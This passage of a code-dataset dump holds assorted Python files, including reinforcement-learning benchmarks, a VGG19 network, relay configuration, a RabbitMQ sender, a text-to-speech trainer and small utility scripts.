Renewables,learning_rate,reward_decay,e_greedy,vanish,epochs):\n self.B = Capacity\n self.W = Window\n self.P = Price\n self.D = Demand\n self.R = Renewables\n self.N = Ntrain\n self.T = Ntest\n self.V = Nvalid\n self.S = Ntest\n self.learning_rate = learning_rate\n self.reward_decay = reward_decay\n self.e_greedy = e_greedy\n self.vanish = vanish\n self.epochs = epochs\n\n \n def stepto(self, action,observation,step,p,pbar,d):\n length = len(p)\n pbar = (1-self.vanish)*pbar+self.vanish*observation[0]\n if action == 0:\n reward = 0\n sl = observation[2]\n ch = 0\n dh = 0\n gh = observation[1]\n stepcost = observation[0]*observation[1]\n elif action == 1:\n reward = (observation[0]-pbar)*min(observation[2],observation[1])\n sl = observation[2]-min(observation[2],observation[1])\n ch = 0\n dh = min(observation[2],observation[1])\n gh = observation[1]-min(observation[2],observation[1])\n stepcost = observation[0]*(observation[1]-min(observation[2],observation[1]))\n elif action == 2:\n reward = (pbar-observation[0])*int((self.B-observation[2]))\n sl = observation[2]+int((self.B-observation[2]))\n ch = int((self.B-observation[2]))\n dh = 0\n gh = observation[1]\n stepcost = observation[0]*(observation[1]+int((self.B-observation[2])))\n \n if step == length-1:\n done = True\n observation_ = 'terminal'\n return observation_, reward, done, pbar, stepcost, sl, ch, dh, gh\n else:\n done = False\n observation_ = np.array([p[step+1],d[step+1],sl])\n return observation_, reward, done, pbar, stepcost, sl, ch, dh, gh\n\n def train(self, d,p,RL):\n d = np.array(d)\n d = d.reshape(self.N)\n p = np.array(p)\n p = p.reshape(self.N)\n level = np.array([10,10000,10000])\n for episode in range(self.epoch):\n s = 0; step = 0; pbar = p[0]\n observation = np.array([p[0],d[0],s])\n while True:\n temp_ob = observation.copy()/level; temp_ob = temp_ob.astype(int);\n action = RL.choose_action(str(temp_ob))\n observation_, reward, done, pbar, stepcost,sl, ch, dh, gh = self.stepto(action,observation,step,p,pbar,d)\n if observation_== 'terminal':\n RL.learn(str(temp_ob), action, reward, observation_)\n print('terminal episode '+str(episode))\n break\n else:\n temp_ob_ = observation_.copy()/level; temp_ob_ = temp_ob_.astype(int);\n RL.learn(str(temp_ob), action, reward, str(temp_ob_))\n observation = observation_\n step = step + 1\n if step>=(len(d)):\n break\n return RL\n \n def rl(self):\n RL = QLearningTable(actions=list(range(3)),learning_rate = self.learning_rate, reward_decay = self.reward_decay, e_greedy = self.e_greedy)\n RL = self.train(self.D[:self.N],self.P[:self.N],RL)\n level = np.array([10,10000,10000])\n n_interval = int(self.T/self.I); \n cost_rl = np.zeros(n_interval)\n for n in range(1, n_interval+1):\n a_real = self.D[self.N+self.V+(n-1)*self.I:self.N+self.V+n*self.I]\n r_real = self.R[self.N+self.V+(n-1)*self.I:self.N+self.V+n*self.I]\n p_real = self.P[self.N+self.V+(n-1)*self.I:self.N+self.V+n*self.I]\n d_real = (a_real - r_real)\n \n d_real = d_real.astype(int)\n \n d_real = d_real.reshape(len(d_real))\n p_real = p_real.reshape(len(p_real))\n \n s = 0; step = 0;pbar = p_real[0]\n observation = np.array([p_real[0],d_real[0],s])\n while True:\n temp_ob = observation.copy()/level; temp_ob = temp_ob.astype(int);\n action = RL.choose_action(str(temp_ob))\n observation_, reward, done, pbar, stepcost,sl, cd, dd, gd = self.stepto(action,observation,step,p_real,pbar,d_real)\n if observation_== 'terminal':\n cost_rl[n-1] = cost_rl[n-1] + stepcost\n break\n else:\n cost_rl[n-1] = cost_rl[n-1] + stepcost\n observation = observation_\n step = step + 1\n if step>=self.I:\n break\n cost_rl_copy = cost_rl.copy()\n for i in range(len(cost_rl_copy)):\n cost_rl[i] = sum(cost_rl_copy[:i+1])\n return cost_rl\n \n def Aour_demand(self,delta,a,p,xc):\n T = int(len(delta)/2); cost = 0\n x = np.zeros(T)\n \n for t in range(T):\n if xc < a[t]:\n a[t] = a[t] - xc\n xc = 0\n break\n else:\n a[t] = 0\n xc = xc - a[t]\n \n for t in range(T):\n if t == 0 :\n x[t] = min(max(0.0,-min(delta[t],a[t])),self.B)\n vb = max(x[t]-0,0)\n va = a[t]-min(x[t]-0,0)\n cost = cost + (va+vb)*p[t]\n else:\n x[t] = min(max(0.0,x[t-1]-min(delta[t],a[t])),self.B)\n vb = max(x[t]-x[t-1],0)\n va = a[t]-min(x[t]-x[t-1],0)\n cost = cost + (va+vb)*p[t]\n return cost,x[t]\n\n def isDecompose(self,at,x0):\n Acc_sum = 0\n Acc = np.zeros(len(at))\n for i in range(len(at)):\n Acc[i] = Acc_sum + at[i]\n Acc_sum = Acc_sum + at[i]\n AccB = Acc + self.B\n \n sadwAB = np.zeros(int(max(Acc)+1))\n \n for i in range(len(at)):\n if AccB[i] <= max(Acc):\n sadwAB[int(AccB[i])] = 1\n sadwAB[int(Acc[i])] = 1\n \n sadwA = np.zeros(int(max(Acc)+1))\n sadwB = np.zeros(int(max(Acc)+1))\n \n i = 0; j = int(Acc[0]); \n while(j <= max(Acc) and i+1<=len(at)-1):\n while(i+1<=len(at)-1 and Acc[i+1]==Acc[i]):\n try:\n sadwA[j] = i+1\n i = i + 1\n except:\n break\n while(i+1<=len(at)-1 and Acc[i+1]>Acc[i]):\n k = Acc[i+1]-Acc[i]\n try:\n sadwA[j] = i + 1\n except: \n break\n while(k > 0):\n j = j + 1\n try:\n sadwA[j] = i + 1\n k = k - 1\n except:\n break\n i = i + 1\n \n i = 0; j = int(AccB[0]); \n while(j <= max(Acc) and i+1<=len(at)-1):\n while(i+1<=len(at)-1 and AccB[i+1]==AccB[i]):\n i = i + 1\n while(i+1<=len(at)-1 and AccB[i+1]>AccB[i]):\n k = AccB[i+1]-AccB[i]\n while(k > 0):\n j = j + 1\n try:\n sadwB[j] = i + 1\n k = k - 1\n except:\n break\n i = i + 1\n \n a_index =np.where(sadwAB==1)[0]\n \n a = [];ts = [];tnz = [];\n for i in range(len(a_index)-1):\n a.append(a_index[i+1]-a_index[i])\n ts.append(sadwB[a_index[i+1]])\n tnz.append(sadwA[a_index[i]])\n \n Trunc_sum = a[0]; t = 0; del_list = [];\n while(Trunc_sum <= x0):\n del_list.append(t)\n t = t + 1\n try:\n Trunc_sum = Trunc_sum + a[t]\n except:\n break\n \n for i in del_list:\n del a[i]\n del ts[i]\n del tnz[i]\n a[0] = Trunc_sum - x0\n return a, ts, tnz\n\n\n def Aofl(self,ts,tnz,abar,p):\n mu_c = 1000000; mu_d =1000000\n a = np.zeros(len(p))\n a[int(tnz)] = abar\n xt = np.zeros(len(p))\n dt = np.zeros(len(p))\n vat = np.zeros(len(p))\n vbt = np.zeros(len(p))\n try:\n p_min = min(p[int(ts):int(tnz+1)])\n except:\n p_min = 1e8\n \n if p[int(ts)]==p_min:\n dt[int(ts)] = 0\n vat[int(ts)] = a[int(ts)]\n vbt[int(ts)] = min(max(abar-0,0),mu_c)\n xt[int(ts)] = 0 + vbt[int(ts)] - dt[int(ts)]\n else:\n dt[int(ts)] = min(a[int(ts)],mu_d,0)\n vat[int(ts)] = a[int(ts)]-dt[int(ts)]\n vbt[int(ts)] = 0\n xt[int(ts)] = 0 + vbt[int(ts)] - dt[int(ts)]\n \n for t in range(int(ts+1),int(tnz)):\n if p[t] == p_min:\n dt[t] = 0\n vat[t] = a[t]\n vbt[t] = min(max(abar-xt[t-1],0),mu_c)\n xt[t] = xt[t-1] + vbt[t] - dt[t]\n else:\n dt[t] = min(a[t],mu_d,xt[t-1])\n vat[t] = a[t]-dt[t]\n vbt[t] = 0\n xt[t] = xt[t-1] + vbt[t] - dt[t]\n \n dt[int(tnz)] = min(a[int(tnz)],mu_d,xt[int(tnz-1)])\n vat[int(tnz)] = a[int(tnz)]-dt[int(tnz)]\n vbt[int(tnz)] = 0\n xt[int(tnz)] = xt[int(tnz-1)] + vbt[int(tnz)] - dt[int(tnz)]\n \n return xt,dt,vat,vbt\n \n def Aofl_hat(self,ao,po,xc):\n a = ao.copy() ; p = po.copy()\n x = np.zeros(int(len(a)))\n d = np.zeros(int(len(a)))\n va = np.zeros(int(len(a)))\n vb = np.zeros(int(len(a)))\n x0 = xc; x[0] = 0\n abar, ts, tnz = self.isDecompose(a,x0)\n cost_shot = np.zeros(len(a))\n for i in range(len(abar)):\n xt,dt,vat,vbt = self.Aofl(ts[i],tnz[i],abar[i],p)\n for t in range(int(ts[i]),int(tnz[i]+1)):\n x[t] = x[t] + xt[t]\n d[t] = d[t] + dt[t]\n va[t] = va[t] + vat[t]\n vb[t] = vb[t] + vbt[t]\n a[t] = a[t] - dt[t] - vat[t]\n if vat[t]+vbt[t]>0:\n cost_shot[t] = cost_shot[t] + p[t]*(vat[t]+vbt[t])\n return x,d,va,vb,cost_shot\n \n def ofl(self):\n n_interval = int(self.T/self.I)\n cost_ofl = np.zeros(n_interval)\n for n in range(1, n_interval+1):\n a_real = self.D[self.N+self.V:self.N+self.V+n*self.I]\n r_real = self.R[self.N+self.V:self.N+self.V+n*self.I]\n p_real = self.P[self.N+self.V:self.N+self.V+n*self.I]\n d_real = (a_real - r_real)\n \n d_real = d_real.astype(int); d_real = np.r_[np.array(0),d_real]\n p_real = np.r_[np.array(self.P[self.N+self.V-1]),p_real]\n \n x,d,va,vb,cost_shot = self.Aofl_hat(d_real,p_real,0)\n cost_ofl[n-1] = sum(cost_shot)\n return cost_ofl","sub_path":"modelselection_sys/benchmark_q.py","file_name":"benchmark_q.py","file_ext":"py","file_size_in_byte":11641,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"633596113","text":"import cv2\r\nimport numpy as np\r\nfrom openslide import OpenSlide\r\n\r\n\r\ndef save_slide_cutting(\r\n file_path,\r\n multiple,\r\n # save_path\r\n):\r\n slide = OpenSlide(file_path)\r\n slide_downsamples = slide.get_best_level_for_downsample(multiple)\r\n downsample = slide.level_downsamples[slide_downsamples]\r\n w_lv_, h_lv_ = slide.level_dimensions[slide_downsamples]\r\n wsi_pil_lv_ = slide.read_region(\r\n (0, 0),\r\n slide_downsamples,\r\n (w_lv_, h_lv_))\r\n wsi_ary_lv_ = np.array(wsi_pil_lv_)\r\n wsi_bgr_lv_ = cv2.cvtColor(wsi_ary_lv_, cv2.COLOR_RGBA2BGR)\r\n\r\n downsample = multiple / downsample\r\n w = int(w_lv_ / downsample)\r\n h = int(h_lv_ / downsample)\r\n img = cv2.resize(wsi_bgr_lv_, (w, h), interpolation=cv2.INTER_LINEAR)\r\n # cv2.imwrite(img, save_path)\r\n return img\r\n","sub_path":"test/data/make_slide_cutting.py","file_name":"make_slide_cutting.py","file_ext":"py","file_size_in_byte":834,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"532534031","text":"# The implementation is based on https://github.com/anishathalye/neural-style/blob/master/vgg.py\n\nimport tensorflow as tf\nimport numpy as np\nimport scipy.io\n\n\nclass VGG19:\n \"\"\"\n A class for the loss network\n \"\"\"\n\n layers = (\n \"conv1_1\",\n \"relu1_1\",\n \"conv1_2\",\n \"relu1_2\",\n \"pool1\",\n \"conv2_1\",\n \"relu2_1\",\n \"conv2_2\",\n \"relu2_2\",\n \"pool2\",\n \"conv3_1\",\n \"relu3_1\",\n \"conv3_2\",\n \"relu3_2\",\n \"conv3_3\",\n \"relu3_3\",\n \"conv3_4\",\n \"relu3_4\",\n \"pool3\",\n \"conv4_1\",\n \"relu4_1\",\n \"conv4_2\",\n \"relu4_2\",\n \"conv4_3\",\n \"relu4_3\",\n \"conv4_4\",\n \"relu4_4\",\n \"pool4\",\n \"conv5_1\",\n \"relu5_1\",\n \"conv5_2\",\n \"relu5_2\",\n \"conv5_3\",\n \"relu5_3\",\n \"conv5_4\",\n \"relu5_4\",\n )\n\n def __init__(self, data_path):\n data = scipy.io.loadmat(data_path)\n\n self.mean_pixel = np.array([123.68, 116.779, 103.939])\n\n self.weights = data[\"layers\"][0]\n\n def preprocess(self, image):\n return image - self.mean_pixel\n\n def undo_preprocess(self, image):\n return image + self.mean_pixel\n\n def feed_forward(self, input_image, scope=None):\n net = {}\n current = input_image\n\n with tf.compat.v1.variable_scope(scope):\n for i, name in enumerate(self.layers):\n kind = name[:4]\n if kind == \"conv\":\n kernels = self.weights[i][0][0][2][0][0]\n bias = self.weights[i][0][0][2][0][1]\n\n kernels = np.transpose(kernels, (1, 0, 2, 3))\n bias = bias.reshape(-1)\n\n current = conv_layer(current, kernels, bias)\n elif kind == \"relu\":\n current = tf.nn.relu(current)\n elif kind == \"pool\":\n current = pool_layer(current)\n net[name] = current\n\n return net\n\n\ndef conv_layer(input, weights, bias):\n conv = tf.nn.conv2d(\n input, tf.constant(weights), strides=(1, 1, 1, 1), padding=\"SAME\"\n )\n return tf.nn.bias_add(conv, bias)\n\n\ndef pool_layer(input):\n return tf.nn.max_pool(\n input, ksize=(1, 2, 2, 1), strides=(1, 2, 2, 1), padding=\"SAME\"\n )\n\n\ndef preprocess(image, mean_pixel):\n return image - mean_pixel\n\n\ndef undo_preprocess(image, mean_pixel):\n return image + mean_pixel","sub_path":"code/johnson/vgg19.py","file_name":"vgg19.py","file_ext":"py","file_size_in_byte":2501,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"230125839","text":"import queries\nimport pandas as pd\nimport geopandas as gpd\nfrom sqlalchemy import create_engine\nimport psycopg2\n\nengine = create_engine(f'postgresql+psycopg2://postgres:Password@localhost:5432/test_counties')\n\n\ndef fix_chmura_counties():\n counties = queries.counties_query()\n counties.set_index(['State', 'County Name'], inplace=True)\n ch_df = queries.generic_select_query('chmura_economic_vulnerability_index',\n ['fips', 'name', 'VulnerabilityIndex', 'Rank', 'state', 'county_id'])\n print(ch_df.shape)\n for i, row in ch_df.iterrows():\n if pd.isnull(row['county_id']):\n try:\n ch_df.at[i, 'county_id'] = counties.loc[row['state'], row['name']]['county_id']\n except KeyError:\n print(row['state'], row['name'])\n # print(ch_df.loc[row['state'],row['name']])\n queries.write_table(ch_df, 'chmura_economic_vulnerability_index')\n return\n\n\ndef populate_table(path: str, name: str):\n df = pd.read_csv(path)\n df.drop(['index'], inplace=True, axis=1)\n df.to_sql(name, engine, if_exists='replace', method='multi', index=False)\n\n\ndef import_geojson():\n gdf=gpd.read_file('temp/USA_Counties.geojson', rows=2)\n gdf['geometry'].apply(lambda x: print(type(x)))\n # print(gdf.head())\n\n\n\n\nif __name__ == '__main__':\n # fix_chmura_counties()\n # populate_table('temp/household_job_availability.csv', 'household_job_availability_new')\n import_geojson()","sub_path":"scripts.py","file_name":"scripts.py","file_ext":"py","file_size_in_byte":1482,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"135057556","text":"import os\nimport os.path\nimport yaml #needs python3-yaml\nimport json\nimport io\nfrom relay import Relay\n\n# Configuration file\nCONFIG_FILE = os.getenv('I2C_CONFIG_FILE', \"/tmp/config.yaml\")\n\n#####################################\n# Relays #\n#####################################\n\nclass Relays:\n __relays = {}\n\n @staticmethod\n def get_relay(id):\n return Relays.__relays[id]\n\n @staticmethod\n def get_relays():\n return Relays.__relays.values()\n\n @staticmethod\n def get_relays_len():\n return len(Relays.get_relays())\n\n @staticmethod\n def is_valid_relayIndex(index):\n return (index >= 0) & (index < Relays.get_relays_len())\n\n @staticmethod\n def is_valid_relayId(id):\n return id in Relays.__relays.keys()\n\n @staticmethod\n def get_relay_byIndex(index):\n if not Relays.is_valid_relayIndex(index):\n raise ValueError(\"Relay index outside range\", index, \"Min Value:\", 0, \"Max Value:\", Relays.get_relays_len()-1)\n return Relays.get_relays()[index]\n\n @staticmethod\n def append(relay):\n Relays.__relays[relay.get_id()] = relay\n\n @staticmethod\n def add(relayStr):\n relay_raw = json.loads(relayStr)\n relay = Relay(**relay_raw)\n Relays.append(relay)\n Relays.write_config()\n return relay\n\n @staticmethod\n def delete(id):\n del Relays.__relays[id]\n Relays.write_config()\n\n @staticmethod\n def read_config():\n # Example\n #\n # relays:\n # - bus: 1\n # data_address: 0\n # description: ''\n # device_address: 16\n # name: Relay_0\n # notes: ''\n if os.path.exists(CONFIG_FILE):\n # Read existing config\n print(\"Reading \"+CONFIG_FILE)\n with open(CONFIG_FILE, 'r') as stream:\n config = yaml.safe_load(stream)\n relays_raw = config['relays']\n for relay_raw in relays_raw:\n Relays.append(Relay(**relay_raw))\n else:\n # Generate default config\n print(\"Creating \"+CONFIG_FILE)\n config = {}\n config['relays'] = []\n # Save initial config\n Relays.write_config()\n\n @staticmethod\n def write_config():\n config = {}\n config['relays'] = Relays.get_relays_raw()\n print(\"Writing configuration\",CONFIG_FILE)\n # Write YAML file\n with io.open(CONFIG_FILE, 'w', encoding='utf8') as outfile:\n yaml.dump(config, outfile, default_flow_style=False, allow_unicode=True)\n\n @staticmethod\n def get_relays_raw():\n relays_raw = []\n for relay in Relays.get_relays():\n relays_raw.append(relay.to_dict())\n return relays_raw\n\n @staticmethod\n def set_status(status):\n for relay in Relays.get_relays():\n relay.set_status(status)\n\n @staticmethod\n def on():\n Relays.set_status(True)\n\n @staticmethod\n def off():\n Relays.set_status(False)\n\n @staticmethod\n def toggle():\n for relay in Relays.get_relays():\n relay.set_status(not relay.get_status())\n\n\n\n\n\n# Init\nRelays.read_config()\n","sub_path":"app/relays.py","file_name":"relays.py","file_ext":"py","file_size_in_byte":3223,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"229783739","text":"import numpy as np\n\nfrom torch_rl.action_blocker.action_blocker import ActionBlocker\nfrom torch_rl.replay.replay import ReplayBuffer\n\n\nclass HillClimbingAgent:\n def __init__(self, input_dims, action_space, gamma, noise_scale=1e-2, enable_action_blocking=False, min_penalty=0,\n action_blocker_memory=None, action_blocker_model_name=None,\n action_blocker_timesteps=1000000, action_blocker_model_type=None):\n\n self.num_actions = action_space.n\n\n self.flatten_state = len(input_dims) > 1\n self.total_fc_input_dims = 1\n for dim in input_dims:\n self.total_fc_input_dims *= dim\n self.w = 1e-4 * np.random.rand(self.total_fc_input_dims, self.num_actions)\n\n self.enable_action_blocking = enable_action_blocking\n self.initial_action_blocked = False\n self.initial_action = None\n if self.enable_action_blocking:\n if action_blocker_memory is None:\n action_blocker_memory = ReplayBuffer(input_shape=input_dims, max_size=action_blocker_timesteps)\n else:\n action_blocker_memory.add_more_memory(extra_mem_size=action_blocker_timesteps)\n self.action_blocker = ActionBlocker(action_space, penalty=min_penalty, memory=action_blocker_memory,\n model_name=action_blocker_model_name,\n model_type=action_blocker_model_type)\n\n self.gamma = gamma\n self.noise_scale = noise_scale\n\n self.best_R = -np.inf\n self.best_w = self.w\n\n self.rewards = []\n\n def store_transition(self, state, action, reward, state_, done):\n self.rewards.append(reward)\n if type(self.action_blocker) == ActionBlocker:\n self.action_blocker.store_transition(state, action, reward, state_, done)\n\n def learn(self):\n discounts = [self.gamma ** i for i in range(len(self.rewards) + 1)]\n R = sum([a * b for a, b in zip(discounts, self.rewards)])\n\n if R >= self.best_R: # found better weights\n self.best_R = R\n self.best_w = self.w\n self.noise_scale = max(1e-3, self.noise_scale / 2)\n self.w += self.noise_scale * np.random.rand(*self.w.shape)\n else: # did not find better weights\n self.noise_scale = min(2.0, self.noise_scale * 2)\n self.w = self.best_w + self.noise_scale * np.random.rand(*self.w.shape)\n\n self.rewards = []\n if type(self.action_blocker) == ActionBlocker:\n self.action_blocker.optimize()\n\n def choose_action(self, env, learning_type, observation, train=True):\n self.initial_action = self.choose_policy_action(observation, train)\n if self.enable_action_blocking:\n self.action_blocker.assign_learning_type(learning_type)\n actual_action = self.action_blocker.find_safe_action(env, observation, self.initial_action)\n self.initial_action_blocked = (actual_action is None or actual_action != self.initial_action)\n if actual_action is None:\n print('WARNING: No valid policy action found, running original action')\n return self.initial_action if actual_action is None else actual_action\n else:\n return self.initial_action\n\n def choose_policy_action(self, observation, train=True):\n if self.flatten_state:\n observation = observation.flatten()\n\n x = np.dot(observation, self.w)\n probs = np.exp(x)/sum(np.exp(x))\n\n if train:\n return np.random.choice(self.num_actions, p=probs)\n else:\n return np.argmax(probs)","sub_path":"torch_rl/hill_climbing/agent.py","file_name":"agent.py","file_ext":"py","file_size_in_byte":3680,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"105462809","text":"\n\nfrom xai.brain.wordbase.nouns._grief import _GRIEF\n\n#calss header\nclass _GRIEFS(_GRIEF, ):\n\tdef __init__(self,): \n\t\t_GRIEF.__init__(self)\n\t\tself.name = \"GRIEFS\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"grief\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/nouns/_griefs.py","file_name":"_griefs.py","file_ext":"py","file_size_in_byte":231,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"84006127","text":"#/usr/env/bin pythoin3\n\nimport pika\nconnection = pika.BlockingConnection(pika.ConnectionParameters(\"localhost\"))\nchannel = connection.channel()\nchannel.queue_declare(queue=\"hello\")\n\nchannel.basic_publish(exchange='',\n routing_key = 'hello',\n body = \"hello world!\")\nprint(\"[x] Sent 'hello wolrd'\")\n\nconnection.close()\n","sub_path":"rabbitmq-example-named/send.py","file_name":"send.py","file_ext":"py","file_size_in_byte":364,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"651323481","text":"import numpy as np\nimport os, sys\nimport torch\nimport torch.nn as nn\nfrom torch.utils.data import Dataset\nfrom torch.utils.data import DataLoader\nfrom torch.autograd import Variable\nfrom model import *\nimport time\nfrom collections import defaultdict\nfrom utils import *\n\n## Locations\nFALCON_DIR = os.environ.get('FALCON_DIR')\nBASE_DIR = os.environ.get('base_dir')\nDATA_DIR = os.environ.get('data_dir')\nEXP_DIR = os.environ.get('exp_dir')\nassert ( all (['FALCON_DIR', 'BASE_DIR', 'DATA_DIR', 'EXP_DIR']) is not None)\n\nETC_DIR = BASE_DIR + '/etc'\n\nsys.path.append(FALCON_DIR)\nfrom src.nn import logger as l\n\n## Flags and variables - This is not the best way to code log file since we want log file to get appended when reloading model\nexp_name = 'exp_baseline'\nexp_dir = EXP_DIR + '/' + exp_name\nif not os.path.exists(exp_dir):\n os.mkdir(exp_dir)\n os.mkdir(exp_dir + '/logs')\n os.mkdir(exp_dir + '/models')\n# This is just a command line utility\nlogfile_name = exp_dir + '/logs/log_' + exp_name\ng = open(logfile_name, 'w')\ng.close()\n# This is for visualization\nlogger = l.Logger(exp_dir + '/logs/' + exp_name)\nmodel_name = exp_dir + '/models/model_' + exp_name + '_'\nmax_timesteps = 100\nmax_epochs = 10\nupdates = 0\nlog_flag = 1\nwrite_intermediate_flag = 0\nphones_dict = defaultdict(lambda: len(phones_dict))\nphones_dict[0]\nprint_flag = 0\n\nclass text2speech_am_dataset(Dataset):\n \n def __init__(self, tdd_file = ETC_DIR + '/tdd.train', feats_dir='../feats/rms-arctic_5msec'):\n\n self.tdd_file = tdd_file\n self.feats_dir = feats_dir\n self.phones_array = []\n self.feats_array = [] \n f = open(self.tdd_file)\n for line in f:\n line = line.split('\\n')[0]\n fname = line.split()[0]\n feats_fname = feats_dir + '/' + fname + '.ccoeffs_ascii'\n feats = np.loadtxt(feats_fname)\n self.feats_array.append(feats)\n phones = [ phones_dict[k] for k in line.split()[1:]]\n self.phones_array.append(np.array(phones))\n\n def __getitem__(self, index):\n return self.feats_array[index], self.phones_array[index]\n\n def __len__(self):\n return len(self.phones_array)\n\ndef collate_fn_padding(batch):\n feats_lengths = [len(x[0]) for x in batch]\n phones_lengths = [len(x[1]) for x in batch]\n max_feats_len = np.max(feats_lengths)\n max_phones_len = np.max(phones_lengths)\n \n \n a = np.array( [ _pad_ccoeffs(x[0], max_feats_len) for x in batch ], dtype=np.float)\n b = np.array( [ _pad(x[1], max_phones_len) for x in batch ], dtype=np.int)\n a_batch = torch.FloatTensor(a)\n b_batch = torch.LongTensor(b)\n\n return a_batch, b_batch\n\ndef _pad(seq, max_len):\n if seq.shape[0] < max_len:\n return np.pad(seq, (0, max_len - len(seq)),\n mode='constant', constant_values=0)\n else:\n mid_point = int(seq.shape[0]/2.0)\n seq = seq[mid_point - int(max_len/2): mid_point - int(max_len/2) + max_len]\n return seq\n #return seq[mid_point - int(max_len/2): mid_point + int(max_len/2)] \n\n\ndef _pad_ccoeffs(seq, max_len):\n\n if seq.shape[0] < max_len:\n kk = np.zeros((max_len-seq.shape[0], seq.shape[1]), dtype='float32')\n return np.concatenate((seq,kk),axis = 0)\n \n else:\n mid_point = int(seq.shape[0]/2.0)\n return seq[mid_point - int(max_len/2): mid_point - int(max_len/2) + max_len] \n\n\n\ntdd_file = ETC_DIR + '/tdd.phseq.train'\nfeats_dir = BASE_DIR + '/feats/rms_arctic_5msec'\ntrain_set = text2speech_am_dataset(tdd_file, feats_dir)\ntrain_loader = DataLoader(train_set,\n batch_size=16,\n shuffle=True,\n num_workers=4,\n collate_fn=collate_fn_padding\n )\n\ntdd_file = ETC_DIR + '/tdd.phseq.test'\nval_set = text2speech_am_dataset(tdd_file, feats_dir)\nval_loader = DataLoader(val_set,\n batch_size=4,\n shuffle=True,\n num_workers=4,\n collate_fn=collate_fn_padding\n )\n\n#for i, (feats, phones) in enumerate(train_loader):\n# print(i, feats.shape, phones.shape)\n\n## Model\nmodel = attentionlstm(len(phones_dict))\nprint(model)\nif torch.cuda.is_available():\n model.cuda()\ncriterion = nn.MSELoss()\noptimizer_adam = torch.optim.Adam(model.parameters(), lr=0.001)\noptimizer_sgd = torch.optim.SGD(model.parameters(), lr=0.001)\noptimizer = optimizer_adam\nupdates = 0\n\n\n\ndef val():\n model.eval()\n l = 0\n with torch.no_grad(): \n for i, (ccoeffs,phones) in enumerate(val_loader):\n\n ccoeffs = torch.FloatTensor(ccoeffs)\n phones = torch.LongTensor(phones)\n ccoeffs, phones = Variable(ccoeffs), Variable(phones)\n if torch.cuda.is_available():\n ccoeffs = ccoeffs.cuda()\n phones = phones.cuda()\n\n ccoeffs_predicted = model(phones, ccoeffs)\n optimizer.zero_grad()\n loss = criterion(ccoeffs_predicted, ccoeffs)\n l += loss.item()\n \n if log_flag:\n logger.scalar_summary('Val Loss', l * 1.0 / (i+1) , updates) \n \n return l/(i+1)\n\ndef train():\n model.train()\n optimizer.zero_grad()\n start_time = time.time()\n l = 0\n global updates\n for i, (ccoeffs,phones) in enumerate(train_loader):\n updates += 1\n\n ccoeffs = torch.FloatTensor(ccoeffs)\n phones = torch.LongTensor(phones)\n ccoeffs, phones = Variable(ccoeffs), Variable(phones)\n if torch.cuda.is_available():\n ccoeffs = ccoeffs.cuda()\n phones = phones.cuda()\n\n ccoeffs_predicted = model(phones, ccoeffs)\n if print_flag:\n print(\"Shape of ccoeffs and ccoeffs_predicted: \", ccoeffs.shape, ccoeffs_predicted.shape)\n optimizer.zero_grad()\n loss = criterion(ccoeffs_predicted, ccoeffs)\n loss.backward()\n torch.nn.utils.clip_grad_norm_(model.parameters(), 0.25)\n optimizer.step()\n l += loss.item()\n \n if i % 10 == 1:\n print(\" Train Loss after processing \", updates, \" batches: \", l/(i+1))\n \n if log_flag:\n logger.scalar_summary('Train Loss', l * 1.0 / (i+1) , updates) \n \n return l/(i+1)\n\n\nfor epoch in range(max_epochs):\n epoch_start_time = time.time()\n train_loss = train()\n val_loss = val()\n g = open(logfile_name,'a')\n g.write(\"Train loss after epoch \" + str(epoch) + ' ' + str(train_loss) + \" and the val loss: \" + str(val_loss) + ' It took ' + str(time.time() - epoch_start_time) + '\\n')\n g.close()\n \n if epoch % 10 == 1:\n fname = model_name + '_epoch_' + str(epoch).zfill(3) + '.pth'\n with open(fname, 'wb') as f:\n torch.save(model, f)","sub_path":"tasks/speech/text2speech/baseline/local/acoustic_modeling/attention_am.py","file_name":"attention_am.py","file_ext":"py","file_size_in_byte":6613,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"275828761","text":"\"\"\"1. 아래와 같이 숫자를 두번 물어보게 하고 ★을 출력해서 사각형을 만드시오\n가로의 숫자를 입력하시오 : \n세로의 숫자를 입력하시오 : \"\"\"\n\ntry:\n num_x = int(input(\"가로의 숫자를 입력하시오 : \"))\n num_y = int(input(\"세로의 숫자를 입력하시오 : \"))\n for y in range(num_y):\n for x in range(num_x):\n print(\"★\", end=\" \")\n print()\nexcept ValueError:\n print(\"No.. input is not a number.\")","sub_path":"한누리/01_quiz/python_01.py","file_name":"python_01.py","file_ext":"py","file_size_in_byte":490,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"592022200","text":"from tkinter import *\nfrom tkinter import messagebox\nimport re\nimport os\nimport glob\n\nclass Application:\n root = 0\n btns = []\n\n def __init__(self, parent):\n self.root = parent\n parent.title('Poems application')\n parent.geometry('%dx%d+%d+%d' % (360, 100, 0, 0))\n parent.resizable(0, 0)\n\n url = os.getcwd() + '\\\\icon.ico'\n parent.iconbitmap(url)\n\n self.menu()\n\n # -------------------------------- Pages --------------------------------\n\n def menu(self):\n self.root.title(\"Menu\")\n\n self.menu_lbl = Label(self.root, text=\"Menu:\", font=\"helvetica 15\")\n self.menu_lbl.grid(row=0, padx=20, sticky='W')\n\n poem_name = self.poem_names()\n\n self.geometry_controll(380, len(poem_name)) # Добавление пространства эквивалентно количеству пунктов меню\n\n for i in range(len(poem_name)):\n b = Button(self.root, text=poem_name[i], command=lambda j=i: self.choice_poem(j),\n borderwidth=2, relief=\"groove\")\n b.grid(row=i, column=1, padx=10, pady=10, sticky='W')\n self.btns.append(b)\n\n self.add_poem_btm = Button(self.root, text=\"Add poem\", command=self.add_poem_cmd,\n 